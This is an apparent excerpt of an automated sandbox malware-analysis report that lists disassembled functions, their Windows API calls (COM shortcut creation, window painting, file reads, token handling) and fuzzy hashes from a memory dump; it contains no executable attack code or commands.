                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                        • Opcode ID: 93cc66ebc7572e5e8fb309e72148f3859d0cab05ce6bd4cb68421b076ddfd3bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6fe9b82d4ca046632f955e662e67cf6351d417e621659d6c7a775514be660bf0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93cc66ebc7572e5e8fb309e72148f3859d0cab05ce6bd4cb68421b076ddfd3bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0E1A3316043209FD764EF25C881AAABBE5BF84314F04856DF9C98B2A2DB35ED05DF91
                                                                                                                                                                                                                                                                                                        Function 01026ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01026F21
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0102707E
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CC4,00000000,00000001,01050B34,?), ref: 01027095
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01027319
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6e4da77b488a9217471a052129e375bea4227842249dfede408d1908de6d3d71
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e1aecb5ed61c7183d1d7e7e2e251361e5003ca4c3fffda16d4a064bf5a3dcad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e4da77b488a9217471a052129e375bea4227842249dfede408d1908de6d3d71
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97D16B71608301AFD300EF25C881DABB7E8FF98744F40496DF5969B262DB75E909CB92
                                                                                                                                                                                                                                                                                                        Function 00FB1B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00FB1B35
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB1B99
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FB1BB6
                                                                                                                                                                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB1BC7
                                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00FB1C15
                                                                                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FF3287
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1C2D: BeginPath.GDI32(00000000), ref: 00FB1C4B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4be0309b6538d5db94de3837293b08e7e387c094e50d0e5ff029481717aa611c
                                                                                                                                                                                                                                                                                                        • Instruction ID: a9132b8264b8d1bd5e4d0a2bf688988653434822336c2a6520ba575f24413a99
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4be0309b6538d5db94de3837293b08e7e387c094e50d0e5ff029481717aa611c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1541D0B1608304AFC720DF25D8D4FBA7BA8FF59334F000668FAD5862A1C7359944EB62
                                                                                                                                                                                                                                                                                                        Function 01021196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 010211B3
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 010211EE
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0102120A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 01021283
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0102129A
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 010212C8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f456730ecc9905b20f0b5987f392f897d84c0c96ba25fc8cb0b87a348be26ef2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 62111bfcf45956c945aa38ad43f0fa92dbcfbf4cedfbf0a7c42cadd6f08b4d44
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f456730ecc9905b20f0b5987f392f897d84c0c96ba25fc8cb0b87a348be26ef2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC41BD71900204EFDF049F94DCC5AAAB7B9FF04310F1480A6FD00AA29ADB35DE64DBA0
                                                                                                                                                                                                                                                                                                        Function 01048C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0100FBEF,00000000,?,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 01048CA7
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 01048CCD
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 01048D2C
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 01048D40
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 01048D66
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 01048D8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 927707ce57caf9b99e9f5f547f44debcfcd8e8a74d085cbd0235333487d2200f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4a18b13d5c59332e6506b7f3d828d6026db2107ba29a3bb155224bdf6a86cc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 927707ce57caf9b99e9f5f547f44debcfcd8e8a74d085cbd0235333487d2200f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B141D4B4602248AFDB76DFA8D5C4BA57BF1FB45304F1480FAE6C85B262D3366445CB50
                                                                                                                                                                                                                                                                                                        Function 010155E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 010155F9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01015616
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0101564E
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101566C
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01015674
                                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0101567E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a0bb7e85e36788a726d879c2b7fdc040b59bea3b62c910b69e7ab3551b76d8e
                                                                                                                                                                                                                                                                                                        • Instruction ID: ffbca89eb54230494fe98ed157b833e0b982c7f40344c4130255378b6ba8439e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a0bb7e85e36788a726d879c2b7fdc040b59bea3b62c910b69e7ab3551b76d8e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA2104722042007BEB265B68AC49E7F7BE9EF8A710F04406AF845CF185EE7DD84197A0
                                                                                                                                                                                                                                                                                                        Function 01026263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010262C0
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 010263DA
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CC4,00000000,00000001,01050B34,?), ref: 010263F3
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01026411
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                        • Opcode ID: c744a64bbbaa9099c0beec2f35147027c089cfd1195e5ff88d484e8dd25244a8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9cdeef0906e8f0df0918e12328dfdc843455bad158878c49d8373de636a3613d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c744a64bbbaa9099c0beec2f35147027c089cfd1195e5ff88d484e8dd25244a8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6D14471A042219FC714DF29C88496ABBE5FF89714F14889DF8899B361CB36EC45CF92
                                                                                                                                                                                                                                                                                                        Function 010486FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01048740
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 01048765
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0104877D
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 010487A6
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0102C1F2,00000000), ref: 010487C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 010487B1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e0f6be3f3cf7a53bdce7ff60bcf5249e09f08e50eb7d128d45d83ae9d1272a51
                                                                                                                                                                                                                                                                                                        • Instruction ID: 30ab1e9d457be03b7cb4e3e55e0544adbc428d25b5494136404db1723b356222
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0f6be3f3cf7a53bdce7ff60bcf5249e09f08e50eb7d128d45d83ae9d1272a51
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521A6B12102419FDB64DFBCCC98A6A3BE5FB44364F148A7AF9E2C21E0DA34D460CB10
                                                                                                                                                                                                                                                                                                        Function 010120AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01011916
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01011922
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01011931
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01011938
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101194E
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,01011C81), ref: 010120FB
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01012107
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0101210E
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 01012127
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,01011C81), ref: 0101213B
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 01012142
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 717178a222d5823067bfd6d98c719319e6907ab7032ddbd5bd9e7c090d1d03f5
                                                                                                                                                                                                                                                                                                        • Instruction ID: c0275ebbe06b1a136e52e8924825acb7b1d40fd22b9e5ddc021ac21dfc97f4cf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 717178a222d5823067bfd6d98c719319e6907ab7032ddbd5bd9e7c090d1d03f5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F111AFB9600205FFDB24DFA8DD48BAE7BA9FF64365F244058FAC197214C73A9940CB60
                                                                                                                                                                                                                                                                                                        Function 00FD36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00FD36E9,00FD3355), ref: 00FD3700
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD370E
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD3727
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00FD36E9,00FD3355), ref: 00FD3779
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fa2a160365f54802fd95a908105d40873cb9e0be4c519eb2c9913cb4fc112e9f
                                                                                                                                                                                                                                                                                                        • Instruction ID: fb0725413c8bd6d9f5a8f23d85ba7eef966a998245be2cfe276d5c4a9b64e7a3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa2a160365f54802fd95a908105d40873cb9e0be4c519eb2c9913cb4fc112e9f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB01F9FAE1D7112EA73526F4ACC56663696FB147B1328022BF650602D0EE1A5D01B381
                                                                                                                                                                                                                                                                                                        Function 00FE30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00FD4D53,00000000,?,?,00FD68E2,?,?,00000000), ref: 00FE30EB
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE311E
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3146
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00FE3153
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00FE315F
                                                                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00FE3165
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
